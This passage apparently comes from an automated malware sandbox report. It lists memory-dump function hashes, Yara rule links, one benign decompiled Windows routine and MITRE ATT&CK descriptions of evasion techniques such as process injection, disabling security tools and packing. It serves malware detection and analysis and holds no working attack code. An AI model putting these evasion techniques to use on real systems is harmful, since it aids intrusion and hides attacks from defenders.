Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 54ab0fda098e465f0181e0b454ba828fd92cbbd3e21a195d11691f6f9213bea5
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 64D0C935352E80CFD616CB0CC554B0533A4BB04B40FC50590E900CB762E62CDD84DA00

Uniqueness

Uniqueness Score: -1.00%

Function 00F235A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: f2ee2e5bc52c9d0863491a835fe31c81d15be2e076b3830c8ba06cc6a73e6228
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 6AD0A7B180119299DB11AB10E5357683373BB00314F5C105590490545AC33D4F1AF602

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3EB, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ffb57876e113afb27d6617c10579b6d4ee74a488f4cc5fe7b63b36c8ada7a8
Instruction ID: 5833245b0f147b2b9ff2440fafccf4023f5496e96c9342c4ef75ab85bf20fe3f
Opcode Fuzzy Hash: 95ffb57876e113afb27d6617c10579b6d4ee74a488f4cc5fe7b63b36c8ada7a8
Instruction Fuzzy Hash: F0B01203F47144048021CC4D3C850B4FB60E18B036D5832FBCD4CB30025A03C41113CE

Uniqueness

Uniqueness Score: -1.00%

Function 00EFDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: b82b50baceae48a0c43deaa059d724149e198e769d5b3fa5b47f944fac6a2c4b
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: DCC08C70280A00AAEB221F20CD02F507AA2BB41B09F4500A07300EA0F0DB7CEC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 11c8b8c9411c6738d4c966b9b82f71fecf3fd356524ddaa2fbfffa006fbc59c0
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D8C08C33180248BBCB126FC1CD01F467F2AFB94BA0F008010FA080B571CA36E9B1EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00F13A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 5ed0ce36c618540ec000e8e763988da674ffe35599b87644ae98f9c3930fb766
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 03C08C32080248BBC7126E41DC01F01BB2AE790B60F000020B6040A5618536ECA0E588

Uniqueness

Uniqueness Score: -1.00%

Function 00EFAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: a76b60d4cda7ea0d437ddc12854cad494850490049ea3509de41283f6570c850
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 3CC08C32080288BBC7126A45CD01F017B29E790B60F000020B6080A6A28936E8A0E588

Uniqueness

Uniqueness Score: -1.00%

Function 00F076E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 14fa3b2e62a66ef48606f4c3fb9b791736757ea998d4efe3874f282c5fbde0d4
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ACC08C70B49BC85AEB2A7708CE21B203660AB08718F4801DCBA06094E2C36EBC02F208

Uniqueness

Uniqueness Score: -1.00%

Function 00F236CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 9718200fbaadb51e1812b8d4719073082ff19bcfd78bdc7451a79436d7412b9d
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 42C02BF0150440BBD7152F30CD01F14B258F740B31F6403587220454F1D52CAC00F100

Uniqueness

Uniqueness Score: -1.00%

Function 00F17D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: aba96bfd5eada3c28a03ecbc135e6a952abd2fedb3722e9b8ffa24cece791582
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: A9B09234301A408FCE16EF18C080B5533F4BB48B40B8440D0E804CBA20D229E8409900

Uniqueness

Uniqueness Score: -1.00%

Function 00F22ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: edba3ffedb703fbc3720d33fca4b3a55ce3630e027f37c9e9b56c26b094347c9
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 2AB01232C10440CFCF12FF40CA10B197331FB40750F054890A00127971C22CAC11EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F398A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059954c93af6d1d00862e099836350505517d1a5e9a9e65e3638c90847c3af76
Instruction ID: d9efe5672912c4ea8166eced847ae0481de5d7e32ad9abaa0c89222585b9daa1
Opcode Fuzzy Hash: 059954c93af6d1d00862e099836350505517d1a5e9a9e65e3638c90847c3af76
Instruction Fuzzy Hash: 4690026130100402D202615944546062409D7D1385F91C022E6415595E86658953F172

Uniqueness

Uniqueness Score: -1.00%

Function 00F3B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5579f5dbb8d381802073707304a13c4ebb6a9cf728393c7f747841ce483acb06
Instruction ID: 65171c91d08a834fd9ca7e86d9b83cdfd9ed6af95c446ea202a41867439b971e
Opcode Fuzzy Hash: 5579f5dbb8d381802073707304a13c4ebb6a9cf728393c7f747841ce483acb06
Instruction Fuzzy Hash: E09002A1701140434640B15948444067415A7E1341391C131A54455A0D86A88855F2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F39820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a173ee477a8137dddcbe74219c2e04c96241bdd06eef021df1f0a83fafda607b
Instruction ID: e075bfc095d4615efa92abeb898d77ca0a7cb04e78870df616dcb6158842d6d3
Opcode Fuzzy Hash: a173ee477a8137dddcbe74219c2e04c96241bdd06eef021df1f0a83fafda607b
Instruction Fuzzy Hash: AA90027134100402D241715944446062409A7D0381F91C022A5415594F86958A56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F399D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724ca922fb73e48b5a8ea810c9e6c132edd33b453d7de06bb50efa4901ced09a
Instruction ID: c871f3040a932c55874a317e1cb49b46188fa90eb8eecaa01289a5dbb0cfadb9
Opcode Fuzzy Hash: 724ca922fb73e48b5a8ea810c9e6c132edd33b453d7de06bb50efa4901ced09a
Instruction Fuzzy Hash: AD9002A131100042D20461594444706244597E1341F51C022A7145594DC5698C61B165

Uniqueness

Uniqueness Score: -1.00%

Function 00F39950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b27d06127f922090932736e9953c8ce93a788f122cf9c026b0dc9e903a358ae
Instruction ID: 5b6f62c49dfeeb693ddc207eefbec11a9888ded04ba498ff98d8512fbb7477c4
Opcode Fuzzy Hash: 6b27d06127f922090932736e9953c8ce93a788f122cf9c026b0dc9e903a358ae
Instruction Fuzzy Hash: DA9002A130140403D24065594844607240597D0342F51C021A7055595F8A698C51B175

Uniqueness

Uniqueness Score: -1.00%

Function 00F39A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591c3a6295951cc94d7a0c66192efeb08b748d6791fcfe275cb1d169a5506dd3
Instruction ID: 30d40a6393dfb7277e39e677cb5725da9876160d7cf4cfe2e34e2ba6bcebb1a5
Opcode Fuzzy Hash: 591c3a6295951cc94d7a0c66192efeb08b748d6791fcfe275cb1d169a5506dd3
Instruction Fuzzy Hash: FC90026130144442D24062594844B0F650597E1342F91C029A9147594DC9558855B761

Uniqueness

Uniqueness Score: -1.00%

Function 00F39A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7d772d676c72a9da6f7c150721bab8b4cbbebd39a7986229b788880b810cf6
Instruction ID: 993d4ab9692ae21dcb308ee20b1438b40b13bf9076256775c3144521bbca2aaf
Opcode Fuzzy Hash: 8f7d772d676c72a9da6f7c150721bab8b4cbbebd39a7986229b788880b810cf6
Instruction Fuzzy Hash: 3990027130140402D20061594848747240597D0342F51C021AA155595F86A5C891B571

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594200a4f01e875c16cbfa9182055aca97134ee9dc41c51120ad7ceeccfa27d0
Instruction ID: 5d9fc3f096235473e739af78b541a3414271fdf1d74f81d6b26c68611996cc55
Opcode Fuzzy Hash: 594200a4f01e875c16cbfa9182055aca97134ee9dc41c51120ad7ceeccfa27d0
Instruction Fuzzy Hash: 8190027130144002D2407159848460B7405A7E0341F51C421E5416594D86558856F261

Uniqueness

Uniqueness Score: -1.00%

Function 00F39B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e97cdc734167c46edabe1438eb1b4b30b6f2ca7abd60cd65d736e4db1a2d6f
Instruction ID: 58bd76976c660de7ebcc0eb9e9b428790357059255020395fa97b332447adb2d
Opcode Fuzzy Hash: 45e97cdc734167c46edabe1438eb1b4b30b6f2ca7abd60cd65d736e4db1a2d6f
Instruction Fuzzy Hash: 3290026134100802D240715984547072406D7D0741F51C021A5015594E86568965B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00F395F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a02fbe1643319f09dd93ba0de8be7fc7ed9d88ca128beb716681c9be69c1787
Instruction ID: fa6c4b852370568d05dfe3a33929847d550c5086d9c678032d1445ab754d6cd8
Opcode Fuzzy Hash: 4a02fbe1643319f09dd93ba0de8be7fc7ed9d88ca128beb716681c9be69c1787
Instruction Fuzzy Hash: 2E90027130100802D20461594844686240597D0341F51C021AB015695F96A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00F39560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8ee6576bbb172d5337e75acaa1e19499ffa136be0edd1f66e7f3677362d61b
Instruction ID: 0961e6fb32c37f756f15280d4b5001700c564b5c5d1d4057570f92da65dbcff7
Opcode Fuzzy Hash: 5e8ee6576bbb172d5337e75acaa1e19499ffa136be0edd1f66e7f3677362d61b
Instruction Fuzzy Hash: 38900265321000020245A559064450B2845A7D6391391C025F64075D0DC6618865B361

Uniqueness

Uniqueness Score: -1.00%

Function 00F3AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31fd384814758a2e206138f05bef79dcac71f8c98c85e7a0ba29312eb1bc189
Instruction ID: 1f5e9d04223f708003ea7d3202ac3f2f3a931c9af620d54328246948c8784ddc
Opcode Fuzzy Hash: e31fd384814758a2e206138f05bef79dcac71f8c98c85e7a0ba29312eb1bc189
Instruction Fuzzy Hash: BE900271B05000129240715948546466406A7E0781B55C021A5505594D89948A55B3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F39520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea15b524c70e996d080201910010ffd8cb5073a6c084274a56b24103941a040
Instruction ID: 84a5ee21a3565a55ee264fc5c308a5c5a9af16c01e6a11bae0d3996a2ee3c9d2
Opcode Fuzzy Hash: 5ea15b524c70e996d080201910010ffd8cb5073a6c084274a56b24103941a040
Instruction Fuzzy Hash: 709002E1301140924600A2598444B0A690597E0341B51C026E60455A0DC5658851F175

Uniqueness

Uniqueness Score: -1.00%

Function 00F396D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d458309c7ee757d7da5d286bdbf25f42039049ee2eecf6630a6a0570064ad0e
Instruction ID: 9319865998bc87f5a79e505fe6a618fbf19137a3491f385d80f2456b13f911d0
Opcode Fuzzy Hash: 8d458309c7ee757d7da5d286bdbf25f42039049ee2eecf6630a6a0570064ad0e
Instruction Fuzzy Hash: 9A90027130100842D20061594444B46240597E0341F51C026A5115694E8655C851B561

Uniqueness

Uniqueness Score: -1.00%

Function 00F39650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9592dbfdd7e7f1b91e78f4de775d37010e3934043bbb124cbc0cd1b8a140832
Instruction ID: 056d5a35537ada8989e0e3ff66dd779c97dfe4c42ad76576ec0dbb85866be7cd
Opcode Fuzzy Hash: a9592dbfdd7e7f1b91e78f4de775d37010e3934043bbb124cbc0cd1b8a140832
Instruction Fuzzy Hash: 1290027130504842D24071594444A46241597D0345F51C021A50556D4E96658D55F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F39610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1685aa770c910323fa45c558723556ba04f57c804c46f225837a78816bc7f125
Instruction ID: 44848f8159f2af6026c06029aea335f12998b2741dbd80dfd52ae4999749c5ed
Opcode Fuzzy Hash: 1685aa770c910323fa45c558723556ba04f57c804c46f225837a78816bc7f125
Instruction Fuzzy Hash: 4390027170500802D25071594454746240597D0341F51C021A5015694E87958A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfc3dbeb582c38cc26e9df4681d2c0b598a7d8643ef76309218154a7c5dcab77
Instruction ID: df2c5e909c008e273fda12d286dce6bda6fa16e53f23010d143e80901a31c444
Opcode Fuzzy Hash: bfc3dbeb582c38cc26e9df4681d2c0b598a7d8643ef76309218154a7c5dcab77
Instruction Fuzzy Hash: D990027530504442D60065595844A87240597D0345F51D421A54155DCE86948861F161

Uniqueness

Uniqueness Score: -1.00%

Function 00F39770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f75b99724a2f8dc8e2bbb07b746c129634998c2deef8a5d05e72a3c07f7c594
Instruction ID: 7c693ef0ab9e63c3293382c2a7b968ff563b789a4657a3e43b4885681975b4ef
Opcode Fuzzy Hash: 3f75b99724a2f8dc8e2bbb07b746c129634998c2deef8a5d05e72a3c07f7c594
Instruction Fuzzy Hash: CB90026130504442D20065595448A06240597D0345F51D021A60555D5EC6758851F171

Uniqueness

Uniqueness Score: -1.00%

Function 00F39760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d52d5b2b500a4013191588e5ac91d68e53f1db81010420c6180262ab8d76c0
Instruction ID: bbe155aff5b05de378f790f2ec47521676456b400cd450339e0e25f8931965f3
Opcode Fuzzy Hash: 53d52d5b2b500a4013191588e5ac91d68e53f1db81010420c6180262ab8d76c0
Instruction Fuzzy Hash: 2C90027130100403D20061595548707240597D0341F51D421A5415598ED6968851B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F39730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd69cf5f66b6084f8c7bff1baef766432762fe7e43e4964ed901ae0ff6dfe2a
Instruction ID: 44d72f479c160fa434f5d15dffd770c695125187b765d38d9d9f80e2ae41b71c
Opcode Fuzzy Hash: 8dd69cf5f66b6084f8c7bff1baef766432762fe7e43e4964ed901ae0ff6dfe2a
Instruction Fuzzy Hash: 2D90026170500402D24071595458706241597D0341F51D021A5015594EC6998A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9cd388e3ac2307a328a273b57ddf09e6d8a5dbb1cb75f8d7e0fdead9bc9e80a
Instruction ID: 067d6c7884d5e2261ce7927bd4d8a6468d3a5b369e18df8dd844b4fb02123ed4
Opcode Fuzzy Hash: c9cd388e3ac2307a328a273b57ddf09e6d8a5dbb1cb75f8d7e0fdead9bc9e80a
Instruction Fuzzy Hash: AF900271301000529600A6995844A4A650597F0341B51D025A9005594D85948861B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F39670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 09d14b498c3d5677e8bf25b523f914a454fe2a3c7b2a98d50cf54ec257181dcc
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00F3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00F85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00F85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00f8fdda
0x00f8fde2
0x00f8fde5
0x00f8fdec
0x00f8fdfa
0x00f8fdff
0x00f8fe0a
0x00f8fe0f
0x00f8fe17
0x00f8fe1e
0x00f8fe19
0x00f8fe19
0x00f8fe19
0x00f8fe20
0x00f8fe21
0x00f8fe22
0x00f8fe25
0x00f8fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F8FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F8FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F8FE2B

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c1575c3a476f5b236bfb2c99fbcac9083bceff8b4e21db1d9d88fcad12cda574
Instruction ID: 64027722ff74ce9ce104affce77ddae7939aa1c03bc80457aa6d91e3155982c0
Opcode Fuzzy Hash: c1575c3a476f5b236bfb2c99fbcac9083bceff8b4e21db1d9d88fcad12cda574
Instruction Fuzzy Hash: 3AF0F632600645BFD6202A46DC02F67BB5AEB44B30F244315F628561E1DA62F860A7F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
